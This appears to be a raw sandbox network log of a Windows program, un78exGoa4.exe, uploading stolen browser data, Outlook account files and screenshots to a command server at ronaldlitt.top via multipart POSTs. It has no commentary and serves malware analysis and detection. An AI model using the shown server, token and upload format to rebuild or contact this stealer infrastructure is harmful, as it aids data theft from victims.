May 28, 2023 09:29:50.512072086 CEST	1518	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.5	49756	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:50.584981918 CEST	1519	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBF Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:50.585052013 CEST	1521	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:50.705813885 CEST	1521	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.5	49757	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:50.784446001 CEST	1522	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:50.784496069 CEST	1523	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:50.879693985 CEST	1524	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.5	49758	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:50.949966908 CEST	1524	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAF Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:50.950014114 CEST	1526	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:51.034110069 CEST	1527	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.5	49759	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:51.117913008 CEST	1527	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECGHJKKJDHIEBFHCAKE Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:51.117974043 CEST	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:51.216484070 CEST	1529	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.5	49760	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:51.286070108 CEST	1530	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDB Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:51.286221981 CEST	1532	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:51.389200926 CEST	1532	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49716	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:42.585167885 CEST	1286	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD Host: ronaldlitt.top Content-Length: 126003 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:42.585295916 CEST	1297	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file_name"YnJvd3NlcnNcR
May 28, 2023 09:29:42.651134968 CEST	1298	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 28, 2023 09:29:42.651776075 CEST	1304	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 28, 2023 09:29:42.651967049 CEST	1306	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 28, 2023 09:29:42.651992083 CEST	1309	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 28, 2023 09:29:42.652255058 CEST	1311	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 28, 2023 09:29:42.652359962 CEST	1314	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 28, 2023 09:29:42.652874947 CEST	1317	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 28, 2023 09:29:42.652976990 CEST	1319	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 28, 2023 09:29:42.652993917 CEST	1322	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 28, 2023 09:29:42.895481110 CEST	1415	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.5	49761	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:51.476957083 CEST	1533	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFIJEBFCGDAAKFHIDBF Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:51.477019072 CEST	1534	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:51.595796108 CEST	1535	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.5	49762	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:51.667911053 CEST	1535	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:51.667992115 CEST	1537	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:51.790338039 CEST	1538	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.5	49763	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:51.858175039 CEST	1538	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:51.858239889 CEST	1540	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:51.948971033 CEST	1540	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.5	49764	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:52.730247021 CEST	1542	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC Host: ronaldlitt.top Content-Length: 723 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 35 39 34 65 36 37 30 64 38 39 31 63 32 33 35 64 62 33 33 64 35 32 33 30 62 30 35 65 61 30 31 37 33 66 64 31 34 38 39 63 36 65 65 34 33 31 38 39 33 66 64 65 38 38 65 34 39 35 37 39 65 31 37 65 66 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 39 6d 64 46 78 50 64 58 52 73 62 32 39 72 58 47 46 6a 59 32 39 31 62 6e 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 59 32 78 7a 61 57 51 36 49 41 70 4e 61 57 35 70 49 46 56 4a 52 44 6f 67 43 6c 4e 6c 63 6e 5a 70 59 32 55 67 56 55 6c 45 4f 69 41 2f 50 7a 38 2f 50 7a 38 2f 50 7a 38 2f 50 7a 38 2f 50 7a 38 2f 50 7a 38 2f 43 6c 4e 6c 63 6e 5a 70 59 32 55 67 54 6d 46 74 5a 54 6f 67 43 6b 31 42 55 45 6b 67 55 48 4a 76 64 6d 6c 6b 5a 58 49 36 49 41 70 42 59 32 4e 76 64 57 35 30 49 45 35 68 62 57 55 36 49 41 70 51 63 6d 56 6d 5a 58 4a 6c 62 6d 4e 6c 63 79 42 56 53 55 51 36 49 44 38 2f 50 7a 38 2f 50 7a 38 2f 50 7a 38 4b 59 32 78 7a 61 57 51 36 49 41 70 4e 61 57 35 70 49 46 56 4a 52 44 6f 67 43 6c 4e 6c 63 6e 5a 70 59 32 55 67 56 55 6c 45 4f 69 41 2f 50 7a 38 2f 50 7a 38 2f 50 7a 38 2f 50 7a 38 2f 50 7a 38 2f 50 7a 38 2f 43 6c 4e 6c 63 6e 5a 70 59 32 55 67 54 6d 46 74 5a 54 6f 67 43 6b 31 42 55 45 6b 67 55 48 4a 76 64 6d 6c 6b 5a 58 49 36 49 41 70 42 59 32 4e 76 64 57 35 30 49 45 35 68 62 57 55 36 49 41 70 51 63 6d 56 6d 5a 58 4a 6c 62 6d 4e 6c 63 79 42 56 53 55 51 36 49 44 38 2f 50 7a 38 2f 50 7a 38 2f 5a 57 46 30 59 53 42 47 61 57 78 6c 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 2d 2d 0d 0a Data Ascii: ------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="file_name"c29mdFxPdXRsb29rXGFjY291bnRzLnR4dA==------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="file"Y2xzaWQ6IApNaW5pIFVJRDogClNlcnZpY2UgVUlEOiA/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/ClNlcnZpY2UgTmFtZTogCk1BUEkgUHJvdmlkZXI6IApBY2NvdW50IE5hbWU6IApQcmVmZXJlbmNlcyBVSUQ6ID8/Pz8/Pz8/Pz8KY2xzaWQ6IApNaW5pIFVJRDogClNlcnZpY2UgVUlEOiA/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/ClNlcnZpY2UgTmFtZTogCk1BUEkgUHJvdmlkZXI6IApBY2NvdW50IE5hbWU6IApQcmVmZXJlbmNlcyBVSUQ6ID8/Pz8/Pz8/ZWF0YSBGaWxlCg==------CBFBKFIDHIDGHJKFBGHC--
May 28, 2023 09:29:52.830106020 CEST	1542	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.5	49765	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:53.208451033 CEST	1542	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFC Host: ronaldlitt.top Content-Length: 142903 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:53.208590984 CEST	1554	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="file_name"c2NyZWVuc2hvd
May 28, 2023 09:29:53.269129038 CEST	1560	OUT	Data Raw: 55 75 30 65 6c 50 32 58 6e 33 2f 45 58 74 66 4c 74 2b 47 78 32 31 68 2f 59 38 76 69 32 38 38 51 32 57 76 57 67 6d 6c 4d 39 31 62 57 46 7a 75 67 6c 4d 72 68 76 33 62 79 4f 42 43 71 67 73 66 6d 38 77 35 41 34 47 54 67 4f 74 66 47 47 6c 36 64 5a 36 Data Ascii: Uu0elP2Xn3/EXtfLt+Gx21h/Y8vi288Q2WvWgmlM91bWFzuglMrhv3byOBCqgsfm8w5A4GTgOtfGGl6dZ6nAxNyl3babaTQxhlZ447Zop9j4wrKTwc4P+0pNcMVB6gUbR6VLoK3LfQartXfX/AIb/ACOlvotB1O0sbSPxHbwvpcbWyyXFtOEuIS7SKy7UYq43lWUgDIBDEVzSpG02xZQkRfAkdSABnqQMn3wM/jSFR6CirhDlJl
May 28, 2023 09:29:53.269191027 CEST	1563	OUT	Data Raw: 5a 48 62 67 66 6c 57 63 6c 7a 4a 6f 75 4c 73 37 6e 30 50 34 62 38 4a 61 68 71 75 6f 79 36 33 71 31 78 4c 48 66 32 31 2b 70 4d 62 72 31 4b 4d 72 4e 6e 32 49 34 47 4f 50 77 72 79 58 34 6d 33 72 52 2f 45 6a 57 30 45 57 37 45 34 35 33 66 37 4b 31 68 Data Ascii: ZHbgflWclzJouLs7n0P4b8Jahquoy63q1xLHf21+pMbr1KMrNn2I4GOPwryX4m3rR/EjW0EW7E453f7K1hSa14jjginl1PVVhm3eVI08gV9vB2nODjvisye4mupmmuJpJpW+88jFmPbkms6lL2z9/Y6MPiZ4Z3ouzY/+0H/AOeP/j3/ANaj7e//ADx/8e/+tUNSSwTW7Ks8MkTMiyKHUqSrDKsM9iOQe9Z/UqPY6f7Yxn8/4L/I
